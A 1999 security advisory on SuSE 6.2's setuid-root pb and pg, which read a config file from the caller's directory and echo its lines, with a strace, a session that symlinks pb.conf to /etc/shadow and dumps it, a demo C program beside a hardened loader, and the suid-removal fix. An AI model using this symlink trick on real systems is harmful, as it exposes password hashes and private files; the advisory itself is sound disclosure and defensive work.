SuSE 6.2 '/usr/bin/pb' and '/usr/bin/pg' allow reading of local files
20 Sep. 1999
Summary
'/usr/bin/pb' and '/usr/bin/pg' are both suid root by default on SuSE 6.2, and can be used by local users to read any file on the system. The cause is the way each program loads its configuration file: it opens 'pb.conf' (respectively 'pg.conf') by bare name, so the file is taken from the caller's current working directory, and every line it cannot parse is echoed back to the caller. Because the open happens with root privileges, a local user who points a symlink of that name at any file gets its contents printed back.
Credit:
This vulnerability was found by Brock Tellier.
Running pb under strace from a directory that contains no pb.conf shows where the configuration file is looked up: by its bare name, so relative to the caller's current directory. The program's own stderr message is interleaved with strace's record of the write() call.

susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or directory)
write(2, "pb.conf fopen: No such file or d"..., 41) = 41
pb.conf fopen: No such file or directory
_exit(1) = ?
susebox:/root #
---
The same program, run by an unprivileged user from a directory in which pb.conf is a symlink to /etc/shadow, opens the file with root's privileges and echoes the content it cannot parse back to the terminal, two lines at a time:

xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec@susebox:/tmp > pb
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> = <bin:*:8902:0:10000::::>
Unknown config line : <daemon:*:8902:0:10000::::> = <lp:*:9473:0:10000::::>
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc. for the entire shadow file
The same scenario applies to /usr/bin/pg, which loads pg.conf from the current working directory in the same way. These two programs also contain numerous buffer overflows and other insecure file I/O and should obviously lose their suid bits. They cannot operate correctly without their s-bits unless they are run by root, but no one besides root will run them anyway.
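The following C program is an added example, not code from the advisory or from the pb/pg sources, which are not shown here. It reproduces the loading pattern the trace and the session above reveal (a configuration file opened by bare relative name from a setuid-root process, with unrecognised "key value" pairs echoed back verbatim) next to a hardened loader, and builds a constructed demo directory in which pb.conf is a symlink to a private file, as in the session. The key names printer and spool, the file contents, the directory layout and the function names are assumptions; the real pb parser and its key set are unknown.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed key set; the real pb.conf/pg.conf keys are not known here. */
static const char *known_keys[] = { "printer", "spool" };

static int key_known(const char *k) {
    for (size_t i = 0; i < sizeof known_keys / sizeof *known_keys; i++)
        if (strcmp(k, known_keys[i]) == 0) return 1;
    return 0;
}

/* The pattern the strace shows: a bare relative name, so the file is whatever the
 * caller's cwd holds, opened with root's privileges in a setuid binary, and every
 * "key value" pair the parser does not know is printed back verbatim. 'echo'
 * collects what would have gone to stderr. Returns the number of echoed pairs,
 * or -1 if the file cannot be opened. */
int load_config_vulnerable(const char *name, char *echo, size_t echolen) {
    FILE *f = fopen(name, "r");               /* follows symlinks, relative to cwd */
    if (!f) { fprintf(stderr, "%s fopen: %s\n", name, strerror(errno)); return -1; }
    char key[512], val[512];
    int unknown = 0;
    echo[0] = '\0';
    while (fscanf(f, "%511s %511s", key, val) == 2) {
        if (key_known(key)) continue;
        unknown++;
        size_t used = strlen(echo);           /* the disclosure: file content to the caller */
        snprintf(echo + used, echolen - used, "Unknown config line : <%s> = <%s>\n", key, val);
    }
    fclose(f);
    return unknown;
}

/* Hardened loader: absolute path only; O_NOFOLLOW so "ln -s /etc/shadow pb.conf"
 * fails with ELOOP; fstat() on the open descriptor (not stat() on the path, which
 * the caller could swap underneath) requiring a regular file owned by the effective
 * user, i.e. root when setuid root, and not group/world-writable; diagnostics that
 * give the entry number, never the contents. Returns 0 on success, -1 on refusal. */
int load_config_hardened(const char *path, int *unknown_out, char *report, size_t reportlen) {
    report[0] = '\0';
    if (path[0] != '/') return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()
        || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    FILE *f = fdopen(fd, "r");
    if (!f) { close(fd); return -1; }
    char key[512], val[512];
    int entry = 0, unknown = 0;
    while (fscanf(f, "%511s %511s", key, val) == 2) {
        entry++;
        if (key_known(key)) continue;
        unknown++;
        size_t used = strlen(report);
        snprintf(report + used, reportlen - used, "config: entry %d not recognised\n", entry);
    }
    fclose(f);
    *unknown_out = unknown;
    return 0;
}

static int write_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, text, strlen(text));
    close(fd);
    return n == (ssize_t)strlen(text) ? 0 : -1;
}

/* Constructed demo directory (an assumption, not real system files): a private file
 * of fake shadow-style lines, the symlink pb.conf -> secret from the session above,
 * and a legitimate good.conf with one unknown entry. Writes the path into 'dir'. */
int make_demo_dir(char *dir, size_t dirlen) {
    const char *base = getenv("TMPDIR");
    if (!base || base[0] != '/') base = "/tmp";
    char tmpl[256], secret[256], link[256], good[256];
    snprintf(tmpl, sizeof tmpl, "%s/pbdemo.XXXXXX", base);
    if (!mkdtemp(tmpl) || strlen(tmpl) + 1 > dirlen) return -1;
    strcpy(dir, tmpl);
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(link, sizeof link, "%s/pb.conf", dir);
    snprintf(good, sizeof good, "%s/good.conf", dir);
    if (write_file(secret, "root:FAKEHASH:10850:0:10000::::\nbin:*:8902:0:10000::::\n"
                           "daemon:*:8902:0:10000::::\nlp:*:9473:0:10000::::\n") < 0) return -1;
    if (symlink(secret, link) < 0) return -1;
    return write_file(good, "printer lp0\nspool /var/spool/pb\ncolour blue\n");
}

int main(void) {
    char dir[256], link[256], echo[2048], report[256];
    int unknown = -1;
    if (make_demo_dir(dir, sizeof dir) < 0) return 1;
    snprintf(link, sizeof link, "%s/pb.conf", dir);
    printf("vulnerable loader through the symlink: %d pair(s) echoed\n%s",
           load_config_vulnerable(link, echo, sizeof echo), echo);
    printf("hardened loader through the symlink: %d (refused)\n",
           load_config_hardened(link, &unknown, report, sizeof report));
    return 0;
}
```

Compile with cc -o pbdemo pbdemo.c and run it: the vulnerable loader prints the fake shadow lines back through the symlink exactly as pb did, while the hardened one refuses the symlink and would equally refuse a file not owned by the effective user or writable by others. Checking ownership with fstat() on the already-open descriptor rather than stat() on the path matters because the caller controls the directory and can swap the file between a check and the open. On an affected system the immediate mitigation is the one the advisory recommends: chmod u-s /usr/bin/pb /usr/bin/pg, then ls -l to confirm the s bit is gone.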